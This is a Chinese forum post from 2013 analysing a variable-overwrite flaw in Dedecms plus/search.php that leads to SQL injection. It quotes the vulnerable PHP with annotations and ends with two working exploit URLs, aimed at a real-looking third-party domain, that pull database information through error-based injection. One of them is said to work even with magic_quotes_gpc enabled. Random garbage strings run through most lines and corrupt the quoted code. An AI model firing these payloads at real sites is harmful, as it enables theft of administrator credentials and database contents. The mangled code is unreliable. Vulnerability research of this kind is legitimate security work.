微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
% a% s+ }4 U) l0 v1 H作者: c4rp3nt3r@0x50sec.org
) A" d5 L/ G' a, ADedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
" t* y4 t7 ?. k9 b3 k6 m: e0 i
" K2 W# `3 a! _8 j5 Z' g* V# G% N黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
' p6 ^9 r( q3 }
: `0 A) z2 ^- o& ?* m============
' b5 h, \8 W: s' E. q
! v' K8 z$ T* g! r3 W * O: z- b6 I) _2 C* e' ^0 s( A* t8 C4 X
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
( s/ @& e+ J+ F* g# r& x
K) c& o7 p9 ^; e$ Vrequire_once(dirname(__FILE__).”/../include/common.inc.php”);
5 s6 R3 Z; E9 zrequire_once(DEDEINC.”/arc.searchview.class.php”);; W$ S! r( M5 C. @" I# v
: v! y" j6 }9 o1 q: J5 x
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;" i( @6 w" x# B
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;! `3 s& p2 Y/ H9 U
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
4 K$ a9 w8 t+ f' t& v$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;2 p5 g( @* M% C3 X( U! f: x) [! k
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0; z/ i) y" `2 W9 r$ d5 f1 g* W
5 l) K2 l* H1 o' e9 H- @# A
if(!isset($orderby)) $orderby=”;
/ n) \# u( @& Q1 qelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
1 U) M% O+ U' }, X& ~6 v- v0 \
8 t1 L" r g" C y3 I4 w ; n3 Q0 @' M0 t8 i" _" b
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
/ E' W. Z3 I- o% B7 D9 j& nelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
# D! b8 j: y& I$ y+ Y7 A7 [( y# C2 z & X8 p6 L; O: b7 d
if(!isset($keyword)){
* w; K6 s1 M5 M4 k, @: G4 ^* w if(!isset($q)) $q = ”;* k1 Q+ A$ t u1 f& t& U5 v
$keyword=$q;- H7 X! z1 `! G- Q3 y) \
}
1 w( O% T2 w6 c( O 2 v8 D/ U( l) ]! u1 Y4 U" V
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));, W; Y' V6 B/ I z3 ?
" M4 N4 X" B! q8 P A1 W
//查找栏目信息
0 L. A8 [+ E3 g$ x6 g Uif(empty($typeid))
- E: n! X$ Q/ O7 x1 f) n{
( f" c* o8 u! T/ O5 b $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;6 O, S9 h' y; e' p; q# ~. o
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
; y* K5 z! j3 d6 T {
* ~/ z: _' J4 H; u $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
) {2 _) Z9 l" q: l fwrite($fp, “<”.”?php\r\n”);
: t* f7 I( m3 Y" I' j: S; r# b# Y $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
# Z ?0 }% m, z5 C5 L4 F+ o8 d& ` $dsql->Execute();) C5 d7 L) R) X, y5 S
while($row = $dsql->GetArray())
0 J3 G) Z/ J1 W0 Y {
: _8 J- P- k3 J- B7 O( w1 p: K( d# ^ v fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
' T" V5 K/ V+ N: [' J2 t5 s, G }
6 h! c3 S6 v$ \& R) R5 [2 Z fwrite($fp, ‘?’.'>’);
% c6 k1 ?( {8 Z% g+ x# K fclose($fp);
1 N$ T. ~. Y8 V1 `" f' N9 i }
5 W$ [: M1 C4 f6 i1 d //引入栏目缓存并看关键字是否有相关栏目内容( X E' w3 J* D5 g
require_once($typenameCacheFile);: E- s/ N! T r& V, e' A/ d: x- `
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
! \& s7 m: |; ^# l# l: _//
( t1 J! D8 ?; u, Z5 A if(isset($typeArr) && is_array($typeArr))
' \- O2 \3 \, J0 _2 Q3 N {0 |. O" Y' q% P# Q
foreach($typeArr as $id=>$typename)
) t, I) w# q6 l9 h7 A$ n5 _5 `# l {
# E6 `1 n7 I4 l. R' f
) B9 D3 D- M8 g2 ?0 G <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过' r* m! Z3 G5 U3 V$ v' {% e
if($keyword != $keywordn)
; j8 t& {, f0 O* O) W {
5 J8 k' V2 R9 b+ ] $keyword = $keywordn;
% { e4 R, C* s" ~; w3 J9 N, o <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设8 F2 C7 I4 r" G2 `4 |, S6 }
break;
/ I( P5 C u2 s% y& R' R }
) Z% T0 X9 I6 G9 U }
* Q! {6 s! s/ ~1 V }
# W# y/ y# B# V( J/ i}7 \5 A$ w/ d/ e
然后plus/search.php文件下面定义了一个 Search类的对象 .
1 E# [' c9 e/ f! `6 C5 z在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.- ]. v8 ~, j# v1 s! S
$this->TypeLink = new TypeLink($typeid);7 B8 L1 a1 B: w, [: s D; g
8 a) S0 @7 v7 s) DTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.* P: Y n' J- e
1 ~: W' w( M( q- z, ]; `5 O& Z+ C; aclass TypeLink1 Y2 p) t/ Y/ B/ L" @# E2 h
{
: o$ `1 @5 `7 J* u var $typeDir;
& Y- C& V r% r. ]9 f) U ` var $dsql;
& \$ j; }/ T8 ]9 j! `% U" T var $TypeID;" g0 o3 p& t, D0 p# G
var $baseDir;+ ~$ B) n' L7 C
var $modDir;2 [4 v! C2 F9 p! b* F: z- E6 N* G$ Z
var $indexUrl;, n: T' Q1 K: \ O j0 ]) k T
var $indexName;; `) j3 p( i8 M" n+ @5 Y" C
var $TypeInfos;
) H' m& c9 P) ?$ t var $SplitSymbol;
4 h' U9 h5 ?1 Z) @6 a% r# x var $valuePosition;
2 t$ b9 |+ O8 |+ C! n; d6 a var $valuePositionName;+ z4 t9 Z9 ]$ r5 h+ P" g
var $OptionArrayList;//构造函数//////// b x8 E2 Z. S. _5 G. `
//php5构造函数
$ S* d( t1 P2 v' t function __construct($typeid); b: T5 A/ O# L8 I1 K+ \! y
{8 ~7 ~. K e! C T" P, X
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];$ e+ s0 h! \0 n5 t3 F$ i
$this->indexName = $GLOBALS['cfg_indexname'];
+ V' r; z" R8 N' d; g8 u) c $this->baseDir = $GLOBALS['cfg_basedir'];
" H- V+ `) ?& e; o $this->modDir = $GLOBALS['cfg_templets_dir'];
' n1 i5 E- \( m. z, O $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];- V u% C9 s ^5 ]4 d3 ^
$this->dsql = $GLOBALS['dsql'];4 y9 P3 X7 A6 Q/ i" Y
$this->TypeID = $typeid;0 w5 | C4 w V1 V- c5 e6 n% I
$this->valuePosition = ”;; @* ~7 t- A2 a" {! K5 G
$this->valuePositionName = ”;
/ F) P z# ]( i1 J" d3 s4 l7 c3 ?+ [, ]1 O $this->typeDir = ”;
v" `, u% |4 I2 l& l5 m* x; r/ j7 L $this->OptionArrayList = ”;# j' l+ X! [% ]$ g
% {) a7 ^: a/ K2 s; g% J
//载入类目信息
; b; D4 Z5 d- m- f9 V 1 K; M: s0 g! o- O0 @) w/ `# D/ \" s
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
: @( |3 ~" |7 |: ]" y& r O3 i- pctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
s! N0 N9 ^. H`#@__channeltype` ch
, g$ l3 ~9 v4 e0 ?* L/ i1 U$ ` on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
9 k. a6 O: [% s) }5 ^ 7 a* y# S, M! X4 B0 k+ Q
if($typeid > 0)" R& L" m1 b/ d/ H
{
8 y7 Y c! j+ b& l+ e $this->TypeInfos = $this->dsql->GetOne($query);
' A) U( Z# k$ t6 R& d& m利用代码一 需要 即使magic_quotes_gpc = Off' I5 b# ?) S9 M- r% ^- W; @
( H. Z; t7 ?% f ^www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
3 o, t9 J% @ }3 k9 Q
, `- Q: Q. W" z) r: T( ?9 A* T这只是其中一个利用代码… Search 类的构造函数再往下
0 h7 t' ^) h/ `' f$ V: K
, f" T) v! q2 H, F……省略2 N2 [+ i# T* s
$this->TypeID = $typeid;9 }5 V: D6 x U
……省略% ]& l) g) o" W! P. C# q1 P
if($this->TypeID==”0″){4 N9 s, s- n% Z* k* y( v7 a. A
$this->ChannelTypeid=1;! C! F% f6 ?& j2 e/ q
}else{0 v3 i1 t, d5 _2 i5 h+ M
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
: r2 L ?/ B A, ^2 |/ w//现在不鸡肋了吧亲…* D1 ], w/ `/ m- k' `, F# z5 I1 `
$this->ChannelTypeid=$row['channeltype'];
, X8 i: s" k; F4 ]% F 8 S9 T$ h# q; S7 |, d
}
$ U* ]6 e+ f& T4 ~5 i利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.! Y7 ], ]* W' S) S2 }( N5 q) u
6 y1 s/ x7 G2 }: gwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
: O( Q- y! g" {6 Y+ |5 h$ q
, w9 [- X/ o6 C) a. A如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站2 r' ?5 r8 O7 k. B
|
发表于 2013-1-19 08:18:56
收藏
支持
反对